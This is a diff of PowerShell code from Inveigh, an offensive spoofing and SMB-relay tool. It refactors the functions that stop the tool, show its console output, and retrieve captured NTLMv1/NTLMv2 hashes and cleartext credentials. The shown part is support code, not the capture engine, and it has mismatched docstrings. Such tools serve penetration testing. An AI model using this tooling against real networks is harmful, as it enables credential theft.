-1851,7 +2108,7 @@ if($inveigh.console_output) if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -1859,12 +2116,6 @@ if($inveigh.console_output) switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -1873,31 +2124,31 @@ if($inveigh.console_output) Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -2021,114 +2272,163 @@ if($inveigh.console_output) function Stop-Inveigh { - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + +if($inveigh) +{ - if($inveigh) + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + + if($inveigh.HTTP_listener.IsListening) + { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) { + $inveigh.unprivileged_running = $false + Start-Sleep -s 5 + Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null - if($inveigh.HTTP_listener.IsListening) + if($inveigh.file_output) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - } + } - if($inveigh.relay_running) + if($inveigh.relay_running) + { + $inveigh.relay_running = $false + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + + if($inveigh.file_output) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + if($inveigh.running) + { + $inveigh.running = $false + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - if($inveigh.running) + if($inveigh.file_output) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + } + else + { + Write-Output("There are no running Inveigh functions") + } + + if($inveigh.HTTPS) + { + & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - } - else + try { - Write-Output("There are no running Inveigh functions") + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() } - - if($inveigh.HTTPS) + catch { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + Write-Output("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - try + if($inveigh.file_output) { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - } } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null } + $inveigh.HTTP = $false + $inveigh.HTTPS = $false +} +else +{ + Write-Output("There are no running Inveigh functions")|Out-Null +} + } function Get-Inveigh { - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Log +Get log entries. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($Console -or $PSBoundParameters.Count -eq 0) +{ while($inveigh.console_queue.Count -gt 0) { @@ -2136,7 +2436,7 @@ function Get-Inveigh if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -2144,12 +2444,6 @@ function Get-Inveigh switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -2158,31 +2452,31 @@ function Get-Inveigh Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -2193,279 +2487,200 @@ function Get-Inveigh } -function Get-InveighCleartext +if($Log) { - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - + Write-Output $inveigh.log } -function Get-InveighNTLMv1 +if($NTLMv1) { - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } + Write-Output $inveigh.NTLMv1_list +} - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } +if($NTLMv1Unique) +{ + $inveigh.NTLMv1_list.Sort() - if($Unique) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - $inveigh.NTLMv1_list.Sort() + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account + Write-Output $unique_NTLMv1 } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list + + $unique_NTLMv1_account_last = $unique_NTLMv1_account } } -function Get-InveighNTLMv2 +if($NTLMv1Usernames) { - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. + Write-Output $inveigh.NTLMv2_username_list +} - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> +if($NTLMv2) +{ + Write-Output $inveigh.NTLMv2_list +} - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) +if($NTLMv2Unique) +{ + $inveigh.NTLMv2_list.Sort() - if($invalid_parameter) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - throw "$($invalid_parameter) is not a valid parameter." - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } - if($Unique) - { - $inveigh.NTLMv2_list.Sort() + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) +} - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } +if($NTLMv2Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } +if($Cleartext) +{ + Write-Output $inveigh.cleartext_list +} +if($CleartextUnique) +{ + Write-Output $inveigh.cleartext_list | Get-Unique } -function Get-InveighLog +if($Learning) { - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> + Write-Output $inveigh.valid_host_list +} - Write-Output $inveigh.log } function Watch-Inveigh { - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. +#> - if($inveigh.tool -ne 1) +if($inveigh.tool -ne 1) +{ + + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { + Write-Output "Press any key to stop real time console output" + $inveigh.console_output = $true - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + while($inveigh.console_queue.Count -gt 0) { - while($inveigh.console_queue.Count -gt 0) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else + switch -wildcard ($inveigh.console_queue[0]) { - - switch -wildcard ($inveigh.console_queue[0]) - { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } + "* written to *" + { - "* for relay *" + if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) } - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + $inveigh.console_queue.RemoveAt(0) + } - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } } - - } - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop } + + } - Start-Sleep -m 5 + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop } - } - else - { - Write-Output "Inveigh isn't running" + Start-Sleep -m 5 } } else { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" + Write-Output "Inveigh isn't running" } } +else +{ + Write-Output "Watch-Inveigh cannot be used with current external tool selection" +} + +} function Clear-Inveigh { - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } +if($inveigh) +{ + if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + +} }
\ No newline at end of file |